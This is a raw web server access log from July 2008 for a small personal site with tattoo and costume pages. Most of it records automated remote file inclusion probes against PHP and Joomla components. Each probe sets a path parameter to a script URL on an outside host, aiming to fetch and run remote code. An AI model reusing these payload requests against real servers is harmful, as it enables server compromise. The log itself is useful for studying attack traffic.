201.116.50.181 - - [14/Jul/2008:22:30:44 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
59.126.172.166 - - [14/Jul/2008:22:31:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
59.126.172.166 - - [14/Jul/2008:22:31:04 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
217.110.54.240 - - [14/Jul/2008:22:33:14 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
217.110.54.240 - - [14/Jul/2008:22:33:14 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
213.238.52.61 - - [14/Jul/2008:22:33:34 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
213.238.52.61 - - [14/Jul/2008:22:33:34 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:33:57 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:33:58 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
213.206.113.104 - - [14/Jul/2008:22:34:39 -0500] "GET /logs/access_log.1183507200/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
213.206.113.104 - - [14/Jul/2008:22:34:39 -0500] "GET /ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
213.206.113.104 - - [14/Jul/2008:22:34:39 -0500] "GET /logs/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
66.98.250.45 - - [14/Jul/2008:22:36:36 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.leokaris.com/bajo.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
66.98.250.45 - - [14/Jul/2008:22:36:37 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.leokaris.com/bajo.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
201.116.50.181 - - [14/Jul/2008:22:41:02 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:41:02 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
194.143.183.8 - - [14/Jul/2008:22:41:16 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
194.143.183.8 - - [14/Jul/2008:22:41:17 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
201.55.48.7 - - [14/Jul/2008:22:41:29 -0500] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
201.55.48.7 - - [14/Jul/2008:22:41:30 -0500] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.238.52.61 - - [14/Jul/2008:22:43:28 -0500] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
213.238.52.61 - - [14/Jul/2008:22:43:28 -0500] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:45:40 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:45:41 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:46:53 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:46:54 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
59.126.172.166 - - [14/Jul/2008:22:47:14 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
59.126.172.166 - - [14/Jul/2008:22:47:15 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
203.72.181.15 - - [14/Jul/2008:22:49:08 -0500] "GET /logs//login.php?dir=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
203.72.181.15 - - [14/Jul/2008:22:49:09 -0500] "GET //login.php?dir=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
201.116.50.181 - - [14/Jul/2008:22:49:19 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:49:20 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
194.143.183.8 - - [14/Jul/2008:22:52:03 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
194.143.183.8 - - [14/Jul/2008:22:52:04 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
66.225.214.141 - - [14/Jul/2008:22:52:04 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
66.225.214.141 - - [14/Jul/2008:22:52:04 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
216.40.230.5 - - [14/Jul/2008:22:53:26 -0500] "GET /logs/product.php?xcart_dir=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
216.40.230.5 - - [14/Jul/2008:22:53:26 -0500] "GET /product.php?xcart_dir=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
203.72.181.15 - - [14/Jul/2008:22:56:59 -0500] "GET /logs//login.php?dir=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
203.72.181.15 - - [14/Jul/2008:22:56:59 -0500] "GET //login.php?dir=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
203.72.181.15 - - [14/Jul/2008:22:59:05 -0500] "GET /logs//login.php?dir=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
203.72.181.15 - - [14/Jul/2008:22:59:05 -0500] "GET //login.php?dir=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
212.227.114.189 - - [14/Jul/2008:23:00:03 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.smilepraxis.de/contenido/includes/xuxuon.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
212.227.114.189 - - [14/Jul/2008:23:00:04 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.smilepraxis.de/contenido/includes/xuxuon.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
203.72.181.15 - - [14/Jul/2008:23:01:58 -0500] "GET /logs//login.php?dir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
203.72.181.15 - - [14/Jul/2008:23:01:58 -0500] "GET //login.php?dir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
85.214.73.149 - - [14/Jul/2008:23:08:00 -0500] "GET /logs/access_log.1183507200/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
85.214.73.149 - - [14/Jul/2008:23:08:01 -0500] "GET /ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
85.214.73.149 - - [14/Jul/2008:23:08:01 -0500] "GET /logs/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
195.85.130.159 - - [14/Jul/2008:23:08:37 -0500] "GET /logs/access_log.1183507200/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
195.85.130.159 - - [14/Jul/2008:23:08:37 -0500] "GET /ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
195.85.130.159 - - [14/Jul/2008:23:08:37 -0500] "GET /logs/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
62.141.48.87 - - [14/Jul/2008:23:09:54 -0500] "GET /logs/db.php?metabasepath=http://secure.steponline.org/cmd? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
62.141.48.87 - - [14/Jul/2008:23:09:54 -0500] "GET /db.php?metabasepath=http://secure.steponline.org/cmd? HTTP/1.1" 404 290 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
213.206.113.104 - - [14/Jul/2008:23:11:04 -0500] "GET /logs/access_log.1183507200/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
213.206.113.104 - - [14/Jul/2008:23:11:04 -0500] "GET /ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
213.206.113.104 - - [14/Jul/2008:23:11:04 -0500] "GET /logs/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
71.101.8.64 - - [14/Jul/2008:23:18:02 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.101.8.64 - - [14/Jul/2008:23:18:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.101.8.64 - - [14/Jul/2008:23:18:02 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.101.8.64 - - [14/Jul/2008:23:18:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.101.8.64 - - [14/Jul/2008:23:18:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
212.227.114.189 - - [14/Jul/2008:23:19:55 -0500] "GET /logs/facileforms.frame.php?ff_compath=http://www.smilepraxis.de/contenido/includes/xuxuon.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
212.227.114.189 - - [14/Jul/2008:23:19:56 -0500] "GET /facileforms.frame.php?ff_compath=http://www.smilepraxis.de/contenido/includes/xuxuon.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
72.52.212.40 - - [14/Jul/2008:23:24:54 -0500] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
72.52.212.40 - - [14/Jul/2008:23:24:54 -0500] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
200.30.73.117 - - [14/Jul/2008:23:29:54 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://geocities.com/rais_corp/tusuk.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
200.30.73.117 - - [14/Jul/2008:23:29:54 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://geocities.com/rais_corp/tusuk.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
75.125.40.130 - - [14/Jul/2008:23:32:26 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:23:32:26 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
65.214.44.28 - - [14/Jul/2008:23:37:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [14/Jul/2008:23:37:22 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
75.125.40.130 - - [14/Jul/2008:23:41:24 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:23:41:24 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
210.245.87.117 - - [14/Jul/2008:23:54:47 -0500] "GET //?path%5Bdocroot%5D=xm/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
210.245.87.117 - - [14/Jul/2008:23:54:47 -0500] "GET /logs/access_log.1212278400//?path%5Bdocroot%5D=xm/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
210.245.87.117 - - [14/Jul/2008:23:54:48 -0500] "GET /logs//?path%5Bdocroot%5D=xm/id.txt??? HTTP/1.1" 200 91388 "-""libwww-perl/5.805"
195.95.229.220 - - [14/Jul/2008:23:57:51 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.95.229.220 - - [14/Jul/2008:23:57:51 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
62.141.56.49 - - [15/Jul/2008:00:01:45 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
62.141.56.49 - - [15/Jul/2008:00:01:45 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
77.221.157.210 - - [15/Jul/2008:00:01:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
77.221.157.210 - - [15/Jul/2008:00:01:54 -0500] "GET //skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
210.245.87.117 - - [15/Jul/2008:00:03:23 -0500] "GET /logs/access_log.1210291200//?path%5Bdocroot%5D=xm/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
217.13.86.112 - - [15/Jul/2008:00:04:07 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
217.13.86.112 - - [15/Jul/2008:00:04:09 -0500] "GET //skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
210.245.87.117 - - [15/Jul/2008:00:12:41 -0500] "GET /logs/access_log.1205884800//?path%5Bdocroot%5D=xm/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
203.31.32.92 - - [15/Jul/2008:00:13:44 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
203.31.32.92 - - [15/Jul/2008:00:13:47 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
203.31.32.92 - - [15/Jul/2008:00:13:47 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
203.31.32.92 - - [15/Jul/2008:00:13:49 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
203.31.32.92 - - [15/Jul/2008:00:13:50 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
193.91.99.14 - - [15/Jul/2008:00:19:37 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
193.91.99.14 - - [15/Jul/2008:00:19:38 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
80.67.26.157 - - [15/Jul/2008:00:20:54 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pskovclub.ru/rec/images/uid??? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
80.67.26.157 - - [15/Jul/2008:00:20:55 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pskovclub.ru/rec/images/uid??? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
189.77.91.153 - - [15/Jul/2008:00:25:12 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.800"
189.77.91.153 - - [15/Jul/2008:00:25:13 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
80.93.56.68 - - [15/Jul/2008:00:26:08 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pskovclub.ru/rec/images/uid??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
80.93.56.68 - - [15/Jul/2008:00:26:08 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pskovclub.ru/rec/images/uid??? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
195.70.36.107 - - [15/Jul/2008:00:26:19 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
195.70.36.107 - - [15/Jul/2008:00:26:20 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
201.116.3.134 - - [15/Jul/2008:00:28:44 -0500] "GET /logs/db.php?path_local=http://www.ldsblvd.com/vnc/mic.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
201.116.3.134 - - [15/Jul/2008:00:28:45 -0500] "GET /db.php?path_local=http://www.ldsblvd.com/vnc/mic.txt? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
62.141.56.49 - - [15/Jul/2008:00:29:35 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
62.141.56.49 - - [15/Jul/2008:00:29:35 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
62.141.56.49 - - [15/Jul/2008:00:29:35 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
62.141.56.49 - - [15/Jul/2008:00:29:46 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
69.234.123.236 - - [15/Jul/2008:00:31:05 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
69.234.123.236 - - [15/Jul/2008:00:31:05 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
69.234.123.236 - - [15/Jul/2008:00:31:05 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
69.234.123.236 - - [15/Jul/2008:00:31:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
69.234.123.236 - - [15/Jul/2008:00:31:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop)"
211.20.85.150 - - [15/Jul/2008:00:31:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
75.125.40.130 - - [15/Jul/2008:00:31:48 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
75.125.40.130 - - [15/Jul/2008:00:31:48 -0500] "GET //include/admin.lib.inc.php?site_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
62.141.56.49 - - [15/Jul/2008:00:34:14 -0500] "GET /logs/access_log.1207785600//modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
62.141.56.49 - - [15/Jul/2008:00:34:14 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
62.141.56.49 - - [15/Jul/2008:00:34:14 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
85.17.3.142 - - [15/Jul/2008:00:35:02 -0500] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://princessonline.com.ar/files/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
85.17.3.142 - - [15/Jul/2008:00:35:03 -0500] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://princessonline.com.ar/files/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.812"
207.44.230.33 - - [15/Jul/2008:00:35:13 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:00:35:13 -0500] "GET //include/admin.lib.inc.php?site_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
195.70.36.107 - - [15/Jul/2008:00:35:20 -0500] "GET /logs/access_log.1207785600//modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.70.36.107 - - [15/Jul/2008:00:35:21 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.70.36.107 - - [15/Jul/2008:00:35:21 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.72.181.15 - - [15/Jul/2008:00:39:33 -0500] "GET /logs/mcf.php?content=http://www.shaker-diffusion.com/id.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.65"
203.72.181.15 - - [15/Jul/2008:00:39:33 -0500] "GET /mcf.php?content=http://www.shaker-diffusion.com/id.txt?%0D?? HTTP/1.1" 404 291 "-""libwww-perl/5.65"
195.95.229.220 - - [15/Jul/2008:00:43:36 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
195.95.229.220 - - [15/Jul/2008:00:43:37 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
83.172.132.29 - - [15/Jul/2008:00:47:19 -0500] "GET /logs/access_log.1207785600//modules/TotalCalendar/about.php?inc_dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
83.172.132.29 - - [15/Jul/2008:00:47:19 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
83.172.132.29 - - [15/Jul/2008:00:47:19 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
